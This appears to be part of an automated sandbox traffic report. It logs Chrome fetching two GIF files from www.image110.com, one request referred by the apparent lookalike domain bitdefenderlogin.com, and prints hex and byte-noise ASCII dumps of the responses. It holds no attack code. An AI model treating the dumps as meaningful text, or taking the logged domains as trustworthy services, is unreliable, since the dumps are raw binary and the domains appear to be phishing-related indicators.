                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 05 0b 05 20 b2 00 ef 0c bf 3e 65 01 b4 58 38 37 00 3f 54 40 d4 47 13 37 6a f9 49 3a e8 10 68 65 8b e4 41 85 32 4c 51 2b cd 10 16 b5 d4 a6 e4 02 a9 fb 4b 6e b4 08 8b e8 55 ec 30 04 43 f0 03 56 30 84 eb 00 8f 8f e8 8b 12 48 91 ad f2 d1 94 00 d2 ff e3 d4 08 3d 70 b9 50 85 09 fb 98 09 a5 d0 8f a1 a3 0d ff d9 0f fb 20 af 8f ed 88 90 ed 9f 88 58 81 5c 2d 90 47 54 13 a2 38 d6 c6 d1 36 88 d1 4d 19 ed 96 7c 1d 15 1c 0c 02 d4 09 b7 24 82 15 56 f0 03 22 60 85 85 fd 4c 3a 8b 53 db 51 3b 62 09 05 07 05 57 a7 7d 5a 1f 0a d4 1a 62 80 f3 83 16 77 1d 3f 0c 2d 05 23 78 0d 56 44 3f d4 11 be 0c 79 8b 1b 60 01 1d 14 2a fa db 44 82 58 b1 ab e0 d2 0c 01 cc 79 2a 43 6e 8c db 89 70 d8 9d c8 89 1f ed 8b 8d b5 b5 96 40 32 98 c8 ad 31 20 89 ba 05 90 79 1a 03 b5 11 98 06 72 14 a3 38
                                                                                                                                                          Data Ascii: >eX87?T@G7jI:heA2LQ+KnU0CV0H=pP X\-GT86M|$V"`L:SQ;bW}Zbw?-#xVD?y`*DXy*Cnp@21 yr8
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: fa f5 ed f3 db 6f 3f df d3 fc f7 e1 d7 9f 3e fb f1 93 54 7f f9 f0 67 1f 52 c7 bd e7 e0 83 43 85 d1 5c 73 ad 0d d5 c4 84 18 66 a8 e1 86 19 86 c1 88 0d 38 21 c0 e1 88 24 4e e8 21 88 41 f1 13 1b 7b 2c b6 e8 e2 8b b5 19 e3 df 54 30 5c a0 d7 33 10 d8 f8 54 0b fd f4 d8 63 0b 37 41 00 01 06 9a b4 f0 4c 53 f2 15 38 20 7d 4b 02 98 a0 82 03 1a 78 54 81 4e e6 23 60 80 05 f2 67 14 82 fb 31 39 a3 51 0d 42 28 e6 98 38 19 90 a1 03 44 45 27 5d 89 6c 6e a8 41 85 34 79 b7 66 9b 74 3a 07 67 4f 2b c2 a8 e7 9e 7c ee 66 8c 51 30 90 81 41 12 35 b5 90 cb 3d fd 40 f1 d3 33 2d 34 ea e8 a3 90 46 2a 69 a4 30 f8 a4 89 8f 3a 36 c5 a3 8f fd 00 59 13 0c 9c f6 03 c1 52 08 3e 19 9f 95 55 d2 07 65 92 a7 3e c9 e4 7e 44 b1 ff ba ea 95 f3 11 98 65 81 43 e9 97 65 7d 52 1e 15 26 99 c0 06 fb 8f
                                                                                                                                                          Data Ascii: o?>TgRC\sf8!$N!A{,T0\3Tc7ALS8 }KxTN#`g19QB(8DE']lnA4yft:gO+|fQ0A5=@3-4F*i0:6YR>Ue>~DeCe}R&
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 5a 6d 30 bb 05 84 08 78 48 e6 cb 67 23 e4 1d 6a eb 62 02 32 42 fe f7 91 15 87 fc 7b f0 c3 17 1f 41 c9 71 7a ae f2 93 2e c7 29 f3 6d 3f f2 7c 5a d0 69 22 aa 8e 7e 4b 5f fa e9 4b d5 38 d4 de d9 fb a7 31 76 ff f5 8f 5d 57 eb 89 ee f0 d2 bb ed f9 4e 78 76 93 d8 db 80 01 bc a3 8c c0 49 7f d1 47 93 f8 f6 10 e0 69 21 2b 20 98 9e 46 aa f7 ff 8f 38 f0 23 1f fa d8 98 44 12 08 84 c4 15 6b 71 e3 63 61 0b 5d f8 42 c1 d0 04 7d 26 39 5f fc 22 a0 39 93 b0 6f 3a 35 7b 1f 9c 7a 88 34 a1 8c 2d 1d 12 b1 1d 37 18 95 ba 71 49 a4 0e 6d 60 62 13 9d f8 c4 d1 a5 eb 89 53 74 e2 ba 8a 18 40 ae 6d 24 8a dc d8 5f 44 0c 98 14 04 26 50 78 77 93 18 3f 08 f0 c0 e0 f1 ae 83 80 b9 9b f3 30 f8 bb e8 85 70 8d 26 84 e0 3f 40 20 42 7d 44 89 8e db 13 9c f7 60 f8 47 40 06 52 90 3d 91 a1 0d 67 58
                                                                                                                                                          Data Ascii: Zm0xHg#jb2B{Aqz.)m?|Zi"~K_K81v]WNxvIGi!+ F8#Dkqca]B}&9_"9o:5{z4-7qIm`bSt@m$_D&Pxw?0p&?@ B}D`G@R=gX


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          18192.168.2.549732103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:33 UTC627OUTGET /uploads/94b22146fe6859b39e2c8cd7b28f3134.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:33 UTC347INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:33 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 65795
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:24:31 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf6f-10103"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:33 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:33 UTC16037INData Raw: 47 49 46 38 39 61 e8 03 64 00 f7 ff 00 7a b7 fe e5 f3 fe 81 9c ba c0 ca d6 76 89 a4 99 2a 48 73 83 9c b5 bb c8 f5 f5 f5 28 cb fa 33 99 fc f1 f1 f1 f8 f8 f8 12 42 6f d2 d6 de eb ee f1 57 83 b0 bd 4e 6b d3 ea fe 5d 88 b6 b9 c5 d2 21 62 ff c7 cc d4 47 72 a0 d9 dd e4 a0 ac bd 1f 95 ff 20 4e 7c b6 c0 cc 38 b8 f5 5d 7b 9c 9e eb f8 23 8b fe 37 bb fe 3a 66 94 e9 ea ed 2c 76 fe 96 ab c4 4c 6a 8c ff 59 66 5c 8f ff a2 b1 c5 03 b8 ff 2d 5a 88 bf e8 fd fd fd fe 99 a3 b5 48 56 77 77 96 b7 6c c8 f9 95 d9 fb 1d 4b 79 2d ca ef ff 00 18 0a 3e 6a a8 db fc 5b c3 fa 59 bd f7 fb fb fb 89 c8 fc 2f de ec 16 47 73 3e 6b 98 43 6e 9c a6 b3 c6 05 3b 67 6e eb ed dc e1 e8 e1 e5 e9 3a e8 e5 8f a4 bd 9f b5 cb 50 a6 fd 4a 77 a4 cd d2 da 44 6f 9d 21 50 7d 53 7e ac 24 53 80 37 63 91 d5 da
                                                                                                                                                          Data Ascii: GIF89adzv*Hs(3BoWNk]!bGr N|8]{#7:f,vLjYf\-ZHVwwlKy->j[Y/Gs>kCn;gn:PJwDo!P}S~$S7c
                                                                                                                                                          2024-06-09 22:40:33 UTC16384INData Raw: 05 21 b8 25 ca ac ca 34 b4 e5 17 8c 0d 34 41 a6 d0 41 a6 78 99 03 06 1d 04 2b c8 56 26 c6 1b db e0 99 f1 09 a1 a5 c6 5e 36 c1 0c 07 de 0a 09 0d 0c 34 28 83 32 64 4c 10 18 04 47 a2 aa 0b 90 03 06 21 80 6b 92 43 b6 24 99 13 31 1f 3f 4c dd 41 e0 01 1c 54 27 f9 59 00 28 2c 43 9b cc 00 39 bc 01 05 ac d0 4c 38 80 3a 30 01 16 00 a1 08 2a 01 06 a8 43 0f 90 43 74 36 80 13 80 02 39 34 80 7b be a7 8a 6e 40 0f 38 da be 88 2a bf dc 64 84 6e 80 3a 9c 81 7a 58 40 30 74 a2 ea 41 5f 03 68 ab 03 ac d7 08 18 c0 b5 22 0b 35 98 c0 3a 4e ff 13 2b 94 43 0f 78 9f d1 41 5f 16 4c a7 42 39 c0 05 ce 45 aa 66 87 4a c9 d3 49 5c c2 0c 34 40 0f f4 80 13 a8 43 10 94 83 0d 28 6c bf 42 a8 3c f6 40 3c cc 41 04 12 40 82 5a 41 0f 60 81 3a 64 01 39 cc c1 66 da 80 1f b8 c1 0c a8 43 03 38 00 a5
                                                                                                                                                          Data Ascii: !%44AAx+V&^64(2dLG!kC$1?LAT'Y(,C9L8:0*CCt694{n@8*dn:zX@0tA_h"5:N+CxA_LB9EfJI\4@C(lB<@<A@ZA`:d9fC8
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 68 cc 60 fa 8c d6 30 c3 67 5d 9a d2 dc cc 30 54 08 a1 19 0d 31 40 89 2f f8 82 37 a0 2f d1 f8 85 37 d8 56 5e 08 cd d1 28 1b a0 db 87 e7 e0 09 0c d0 84 75 65 d7 76 5d 57 97 13 8d 3c 5c 8d 7d 3b 9c c3 69 2d 9c 00 23 35 4a 41 11 b3 57 9a b8 cd 04 44 31 50 10 2d de cc 54 af 3b a7 a2 50 d4 19 b0 c0 66 73 11 22 f0 46 f2 b9 84 ff f3 12 e5 bc 32 78 5a a8 55 89 90 48 89 87 5e d0 35 0c d9 28 1e 49 33 6a 78 84 76 f0 42 9e 22 89 23 33 09 6e 38 07 0a c0 04 b9 0a c7 61 28 4f 7f 08 04 2a f0 81 25 e0 86 40 70 1f 1f a0 ab 42 0b 46 50 ff 83 3f fb 64 92 48 d0 3d df e3 cf 24 b8 00 29 93 a9 2d 13 81 d3 bb b2 05 98 9f 24 f0 05 05 f5 05 33 60 d0 38 81 02 3a 88 59 9a fc 31 0c 05 11 7d 34 89 c5 33 03 3e a0 03 5a a0 05 3e 88 5a 3a 30 83 15 fd 16 68 d0 81 b6 75 db b7 85 db b8 75 db
                                                                                                                                                          Data Ascii: h`0g]0T1@/7/7V^(uev]W<\};i-#5JAWD1P-T;Pfs"F2xZUH^5(I3jxvB"#3n8a(O*%@pBFP?dH=$)-$3`8:Y1}43>Z>Z:0huu
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 3a ff 60 31 b8 17 d9 b0 64 ca 5b 47 ab 3a c7 22 a8 18 ad 4a 30 a1 c8 45 d0 96 28 50 2c 8f 6d 03 53 14 44 e0 56 96 57 95 0d 14 17 69 13 18 9b f5 8f 18 f1 70 79 c7 d3 1c f7 5e 64 a9 86 ac c6 28 cb 5b 23 63 20 22 ab 83 18 21 88 b3 43 48 8c 36 30 3b e6 cd 0e 1d 03 51 44 ea d0 24 90 2b c0 af 48 ed 48 a4 41 fa b8 b9 2c fd e3 78 78 94 51 91 72 f7 18 81 f0 ae 46 50 1a 08 3a 2c 74 a6 47 71 03 79 31 92 91 13 0a c2 bb 22 75 a8 1a 9d 4c 93 40 14 01 c1 11 cd a8 46 41 0c e5 25 33 23 85 13 91 a7 1d 7f 48 a5 2a af 41 a3 56 26 29 7a 45 82 c8 f4 6a e4 1d 5a 62 32 33 34 b9 0e 79 c8 43 a4 eb 58 cf 7e f1 3b 91 31 bd 43 a4 5a d2 f2 97 34 f2 ce 8c 86 d8 b5 1a 9d 48 39 e4 19 53 3b c8 33 20 f0 08 24 49 f6 3b 91 1b 56 60 bd 78 b8 b3 48 48 d2 a6 28 6b 67 4a e5 5c e7 44 b9 cb 4c 66
                                                                                                                                                          Data Ascii: :`1d[G:"J0E(P,mSDVWipy^d([#c "!CH60;QD$+HHA,xxQrFP:,tGqy1"uL@FA%3#H*AV&)zEjZb234yCX~;1CZ4H9S;3 $I;V`xHH(kgJ\DLf
                                                                                                                                                          2024-06-09 22:40:34 UTC606INData Raw: 7f ff ac c6 02 36 30 87 72 cc 61 68 8f d4 e3 23 25 d1 c9 05 2c 91 23 a7 61 06 06 24 31 0c 53 9a f2 1a a9 bc c6 28 54 99 ca 79 2c 63 21 03 9b 82 3b ca b6 84 1f 48 f0 72 67 4b 87 3b de f1 11 2b 28 ac 21 37 cc cc 35 4e 59 ca 61 ac 32 95 a3 50 e6 2a e7 f1 8f 15 ba 23 1d 11 7a 85 01 9f 71 85 2b 6c 63 0f 47 d8 43 36 b7 d9 4d 6f 6e e3 0a de 3c 42 0a 5e b3 cd 71 a6 00 9d 29 20 46 3a d9 99 ce de a8 93 35 e4 dc 03 3a 95 c3 85 e7 9c e3 7d c8 1b 9e 7d 34 75 84 2b 60 cb 40 de bb 1d 01 d9 c1 87 df 01 6b 15 d6 fc c7 75 66 b7 90 2b 1c e7 35 0b 79 8d 3c b5 c9 cd 3d 2c 60 75 f0 60 87 7e 9e d7 29 c7 e8 0e 5b ba 2b d6 fa 86 95 04 dd 19 a8 09 e6 db 56 34 7f 60 99 20 3e 6e 09 22 f0 c1 ea 1e c7 0e 6c 3d ce 3e 94 b9 1d 04 78 2a ad 6a f5 b4 7c f0 81 c0 f0 0e f8 0f f6 f9 60 7e 23
                                                                                                                                                          Data Ascii: 60rah#%,#a$1S(Ty,c!;HrgK;+(!75NYa2P*#zq+lcGC6Mon<B^q) F:5:}}4u+`@kuf+5y<=,`u`~)[+V4` >n"l=>x*j|`~#


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          19192.168.2.549735103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:33 UTC384OUTGET /uploads/94c3b0fa5cb4f8bbeb3618f9358d7414.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:34 UTC348INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:33 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 318019
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:24:31 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf6f-4da43"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:33 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:34 UTC16036INData Raw: 47 49 46 38 39 61 e8 03 64 00 f7 ff 00 df b2 95 66 a1 86 00 4c 2a 2a 8b 5a 5d 6a f2 f7 e7 77 f7 d6 35 a1 0c 18 a6 c8 b4 ff f7 db d8 15 29 ff de 86 35 50 f9 ec ec fb d8 60 27 e7 e7 ec f9 dd c9 ff ec c9 d4 d4 b1 52 2d 23 d7 d6 dc d3 ce 8f a1 a0 2e ff ef b9 c8 c6 cb d6 e7 dd 94 71 5d ff de 77 5c 46 35 0c 71 47 ef ce 22 a7 a5 a8 b9 b8 bb 56 4b 46 63 96 6e 63 8e 4b a7 b6 8c ef ce 08 f0 69 57 60 5d a0 08 07 06 d2 b9 4d 1f 38 e0 ae b6 ff 84 af 97 d4 c9 6f 9a 97 98 a7 b1 6f b4 b1 ca 8e 96 ff a9 aa 4e 19 2a af 21 7a 4d fc b6 48 68 55 4d ba d5 c4 76 72 74 4f 92 70 ff f7 e7 b0 50 18 ff ce 44 cb b8 32 92 af 70 fc ad 6e f0 2e 3f 31 2b 29 fb d9 bc 11 5f ab 67 85 30 f3 8e 4f 73 84 fe aa 9d 97 f4 ab 34 9d 73 95 cd b3 6e 90 b8 a3 de de e5 88 85 86 fd ea d7 af 8f 72 ef 95
                                                                                                                                                          Data Ascii: GIF89adfL**Z]jw5)5P`'R-#.q]w\F5qG"VKFcncKiW`]M8ooN*!zMHhUMvrtOpPD2pn.?1+)_g0Os4snr
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 4e d3 74 49 c7 71 3f 88 d8 1c af 18 11 93 86 7b 42 4c 06 96 6f 6b 31 2b 08 79 8c a6 c1 27 b1 10 dd eb 9e 45 ec 9a a0 24 fb 05 53 87 2b 44 51 47 03 c5 13 b9 f2 8c 64 ad 48 0f d4 34 50 33 43 0f 60 4d 07 8c c0 59 eb f4 f1 a2 34 5c b7 34 89 ec 83 3f fc 34 5c 43 af 59 c7 f5 08 ec 47 59 db f5 48 ab 10 73 c4 b5 59 6f 81 5a 5b 40 5e e7 74 c9 74 e4 41 c2 f2 62 3f 56 da 4c 6c 57 18 c2 36 6c 83 36 9c db b9 6d 80 4f 9c 73 2d bb c0 11 b8 ff 49 1b a0 02 08 54 81 1b e5 2f 69 17 a9 fe 96 76 91 16 e9 91 82 c0 4f 51 69 96 3c 4e 44 7c 00 13 d0 d1 21 6a a9 b2 31 9b 1f 3c b0 37 4f c1 13 d9 84 9a 5e 30 9a a2 01 9c 42 15 2a 50 a2 0e d8 c2 45 88 40 02 44 00 73 4b c0 08 14 92 4f f8 80 0c 00 45 d5 a6 72 0c 27 85 53 d4 b0 3f 7f 2d 24 49 31 c1 cd 26 32 f2 30 c1 1c cf c2 58 6a f8 9d
                                                                                                                                                          Data Ascii: NtIq?{BLok1+y'E$S+DQGdH4P3C`MY4\4?4\CYGYHsYoZ[@^ttAb?VLlW6l6mOs-IT/ivOQi<ND|!j1<7O^0B*PE@DsKOEr'S?-$I1&20Xj
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: b1 c0 68 50 cc db c2 77 22 dc 9f 7a 55 dc 4a 64 7f a0 4c 6a f2 a4 e2 dc 49 e4 1c 04 b7 fb 06 d1 71 c2 5c b7 14 f6 a3 6f 61 d5 f9 e3 18 cd a3 36 bb a2 75 da 27 bb a2 11 d8 95 5a bc 2d 77 eb 2c 59 e5 9a b0 5b b6 d9 f5 58 c6 89 53 02 14 55 7e f9 15 7c d6 49 9a a2 8d 7b 74 51 eb 50 0e 8e 23 c5 80 8f 94 68 8e 62 e0 67 b8 3f 57 9d a1 85 c9 9a c1 cc fc f2 cf c7 cc 0f f1 d9 9e 61 88 f4 e3 ef 02 fd f9 e3 ab 7a 55 a1 c4 af 84 7e fe d5 2f 9f 56 f1 e5 af 3d f0 e9 9f fc d0 a7 2a fc d1 6d 77 3d 41 da 7a 88 d2 b7 68 55 6e 2a dc e2 47 53 28 88 13 c8 35 05 5c 0b 6c 8b b7 14 43 ff 03 10 28 49 84 78 c8 00 8b 72 52 42 12 e2 e1 01 39 01 9c 63 76 32 a4 a3 30 22 83 7b e1 89 b7 68 b0 42 c2 78 8e 42 b6 c8 41 bf f8 01 c3 0d 49 a6 69 43 94 5a d3 16 56 44 24 12 d1 34 1d 53 ca 66 1a
                                                                                                                                                          Data Ascii: hPw"zUJdLjIq\oa6u'Z-w,Y[XSU~|I{tQP#hbg?WazU~/V=*mw=AzhUn*GS(5\lC(IxrRB9cv20"{hBxBAIiCZVD$4Sf
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: ff 3d 63 3d 61 7b df 1b 4d 13 5b d3 86 95 93 45 f6 54 b8 a1 fd 20 40 40 a9 78 da 64 64 dc b4 1a cf b8 a9 47 c3 71 90 63 3c e4 98 f0 1e 2a 36 2e 72 94 9f 5c e5 19 17 39 8f 0f cc 0f 95 c2 1a 80 02 a4 75 01 8f cc 99 24 73 66 ca cf f6 4a 01 bf 71 c1 0d 99 b0 a8 d7 ca 56 79 59 c4 f3 ec 9a 70 1f d3 f6 4e 77 bd 72 85 91 b3 7c e5 51 d7 b8 b9 41 e2 83 a9 a7 5c ea 5b 07 b9 0f 44 62 08 aa 6b 3d ec 98 b8 c2 4c b2 7e 76 ae 8b 5c db 51 5c f2 09 9d 1b 6f ce 48 a1 cf 09 06 ae f4 3c 65 0a 97 1b f4 64 79 6a c8 f4 fa ce 1b f6 28 16 52 94 58 01 e1 09 df 46 7e 48 c3 f0 85 67 fc a2 36 c2 58 08 65 44 e2 03 de f4 c2 1f 85 31 d3 ba 03 e3 9a cf 7c 32 42 2d 9a cd 87 be f3 a3 4f 06 19 36 42 7a ce 27 23 f5 ab 17 bd ea 4b 5f 45 8a bc 1a c8 ec f9 a4 71 9d 18 94 0e e5 1e 01 ba ef 90 b3
                                                                                                                                                          Data Ascii: =c=a{M[ET @@xddGqc<*6.r\9u$sfJqVyYpNwr|QA\[Dbk=L~v\Q\oH<edyj(RXF~Hg6XeD1|2B-O6Bz'#K_Eq
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 84 b9 f0 49 bb b9 c3 b9 e8 01 67 60 06 f5 2c d2 23 35 52 c7 60 49 01 b8 82 47 34 d2 27 4d d2 a4 70 52 24 8d d2 47 ec 04 ce d0 80 24 dd d2 47 1c 81 13 29 d1 7c cb cc 9c 20 49 e6 1a 82 f5 00 4f e8 14 8a 4b 8b 2c ff 34 35 14 86 78 ca d3 f3 c5 85 30 bd c4 d8 ca 19 ac 89 10 93 86 9d e0 3d a3 e4 d2 2a 75 86 03 15 1f 4b b0 d2 3f 65 86 24 eb 87 01 2d d4 24 b5 84 b1 54 02 45 8d d2 06 7d 54 24 7d 82 b1 4c 01 28 7d d4 e8 b9 87 4b dd 54 f5 64 54 f1 51 02 3f bd 54 0b 5d 2d a4 bc be 7c d4 29 06 e0 d0 0e a5 d1 b1 72 8a c0 a2 a5 ad 80 c3 ee 02 4a cd a4 43 9c 28 3b 86 dc 8a 5f b2 33 1f d9 09 a3 da 09 1b 6d 0a 3f 3c 21 1a 40 1c 3f f4 06 20 d9 11 f5 da 1c 0e 7a 4d c7 48 81 f9 54 4f 69 9d 4f 26 d9 02 0b b0 56 6c bd 56 30 b0 80 72 12 80 1e 98 56 70 4d cf a4 f8 d6 68 2d d7 1e
                                                                                                                                                          Data Ascii: Ig`,#5R`IG4'MpR$G$G)| IOK,45x0=*uK?e$-$TE}T$}L(}KTdTQ?T]-|)rJC(;_3m?<!@? zMHTOiO&VlV0rVpMh-
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: d6 4d ab ce 5e ac 3e 6b dc ec 62 b2 5e eb ab 36 bd d1 f8 c4 86 2a 63 d9 78 e1 02 e6 8c b5 c5 4e ad 08 06 6f 88 96 b9 1a 65 ad 34 42 b3 5d 1b 28 ba e3 52 ea 63 23 e3 63 91 08 3e 28 5c d3 52 66 eb af 66 68 ff 44 eb ab c6 cd 07 96 6c af 16 09 c7 3e eb 48 9e 6c ce 66 de fa eb 01 cb c6 ea 4c 0e 6d dd 24 c8 ce 46 eb 4f a6 89 44 a0 08 80 ce d8 9f 98 4f 1b 91 3b bd 9a 4d 9a 66 5d 39 49 5d 1e e5 bb 98 01 0f da e5 08 ff c1 e3 cc d8 23 b0 04 79 40 5d b6 6d 8e 50 4d 7e c0 4c 3a 21 e6 82 8a ce 60 69 00 aa 06 0d 0f 68 66 77 98 6e 58 a8 6e ea 66 2d 25 b8 6e eb c6 6e ee ae 62 87 f0 03 ef 1e 6f eb ce de ee 3e ef 66 1e 67 ea 46 6f ee 3e e7 1b 45 d9 32 0e 8e 4b a9 4e b9 ba ce ee 40 53 16 88 aa ed 52 df f7 0c ec 07 68 0a 29 c0 5f 3c 06 8a 5f 5b be 66 53 96 ff 05 89 d8 61 4b
                                                                                                                                                          Data Ascii: M^>kb^6*cxNoe4B](Rc#c>(\RffhDl>HlfLm$FODO;Mf]9I]#y@]mPM~L:!`ihfwnXnf-%nnbo>fgFo>E2KN@SRh)_<_[fSaK
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 86 b6 0b b9 60 3d 28 39 9c 04 ed ee 68 66 0c 9b 01 2e 36 c9 61 25 73 97 5f 7d 62 58 79 70 b6 ce 0d cb 88 7e d6 0f 75 eb 73 b1 3f d7 bd d5 05 ed c4 1f 19 58 16 9f d1 72 46 23 9b 05 0f 03 ec fe bd c9 89 78 90 e2 cc 78 d4 7d 2e 92 0b f7 f2 53 98 5f 7e 4a 1f 85 d4 12 7f fc 54 c4 c2 47 35 11 38 91 37 16 61 f4 d1 5d 1f cd e7 cf 5e 13 2a 84 60 54 79 71 94 c3 52 22 c4 67 9f 42 05 0e f8 5e 43 61 18 60 95 07 27 46 93 a2 55 70 b1 b8 a2 8a 2c 12 b1 90 05 2f da 78 e2 8c 0a c1 88 62 8c 06 bc a5 10 11 3b 0a 99 62 5d 48 fd 97 d1 0d 0f 8d 24 60 43 47 92 08 51 19 c3 90 57 d9 69 19 ad 40 5b 61 46 50 86 65 61 a1 4d 74 db 6a 2a 5d c9 ff 65 61 d2 58 f9 91 34 04 18 16 c7 47 62 88 f1 49 1c 6e 9a 79 de 67 93 a9 d4 00 03 5e ce 86 65 6b fc 78 b6 da 28 43 f6 d8 9b 61 47 dc c8 a3 07
                                                                                                                                                          Data Ascii: `=(9hf.6a%s_}bXyp~us?XrF#xx}.S_~JTG587a]^*`TyqR"gB^Ca`'FUp,/xb;b]H$`CGQWi@[aFPeaMtj*]eaX4GbInyg^ekx(CaG
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: c8 00 7d 62 a5 71 54 cd ce 96 d8 46 af c4 29 c5 ac 82 ff 8b 18 09 e3 4a c2 21 41 82 84 b5 89 03 b6 c4 30 57 9e 00 11 60 c8 d8 85 38 01 3b 3a c0 3a f1 04 82 fd 6b 60 c5 79 86 a4 a4 20 b1 83 15 a7 13 b5 f0 d8 c9 22 b6 42 56 40 2c 65 05 db 54 ae 26 09 36 67 ed e0 54 00 2a 94 34 9e 55 64 79 7a e3 4c b0 97 81 3c b0 b2 50 0c 6c 19 41 5e 6b 93 88 1e d4 99 34 93 c2 45 63 26 db d2 62 a7 6c 57 3b 2c 70 c5 69 ac 03 66 36 b0 43 1d 88 d3 30 ab 5c c0 42 cd 10 cb 75 ac 24 f7 d1 81 e0 52 b6 54 8e 5d 6e 01 d9 47 5d c4 c2 63 24 db 15 ec 4f 89 63 95 85 8a 97 aa 34 13 ca 2b 9d 3a 95 7d cd 92 b7 d9 01 61 f0 86 77 a3 af 44 93 5d d9 79 61 34 6f 32 98 fc ba f7 2b 60 a1 e6 34 a3 aa 14 06 68 55 36 8e 99 6f 7f b3 03 af b3 e8 03 19 e5 40 46 83 1f 1c 61 64 98 b3 1f 27 90 b0 83 21 9c
                                                                                                                                                          Data Ascii: }bqTF)J!A0W`8;::k`y "BV@,eT&6gT*4UdyzL<PlA^k4Ec&blW;,pif6C0\Bu$RT]nG]c$Oc4+:}awD]ya4o2+`4hU6o@Fad'!
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 15 86 0a f0 5b 2e c6 e2 2d ea 62 19 f2 62 65 d4 a2 30 06 e3 30 ae a2 31 46 97 4a 04 20 96 4c 99 4a cc a0 6c 09 c4 22 5a 23 22 1a 84 0e 36 44 b7 7c 55 a7 2d 84 ff e0 de 2f 4d 04 1f f4 ca af ec 41 43 7c d5 d1 35 44 7c 68 d5 42 50 da aa 1d 9f 45 18 ce 42 8c d0 03 6c ff 21 43 f4 9e 17 e2 85 f4 a5 83 31 f8 23 40 fe e3 3f 6e 9d 00 a4 43 40 1e a4 40 22 24 40 f6 61 43 08 00 f9 25 24 44 2a 64 44 ce 21 44 9c 9a 82 4c 85 ee e1 d3 cb 81 cd 30 34 c2 30 0c c1 0c 0c 41 51 a9 80 16 dd ce 96 7c 51 46 dc 9d 6b 21 14 4a e6 dd a0 01 9e 1a 55 46 f1 6c c6 69 38 a0 c7 f0 9f 50 5d 62 3f cc c0 09 48 a4 4f 46 a4 31 98 c1 0c 74 d7 0c 68 01 50 fe a4 42 36 41 2f ee 9b 16 20 e5 51 42 a4 06 2c e5 4e 1a a5 53 22 a5 52 f2 5d 46 40 23 96 30 00 25 e0 64 03 a8 89 48 86 e5 0c 08 46 07 78 cd
                                                                                                                                                          Data Ascii: [.-bbe001FJ LJl"Z#"6D|U-/MAC|5D|hBPEBl!C1#@?nC@@"$@aC%$D*dD!DL040AQ|QFk!JUFli8P]b?HOF1thPB6A/ QB,NS"R]F@#0%dHFx
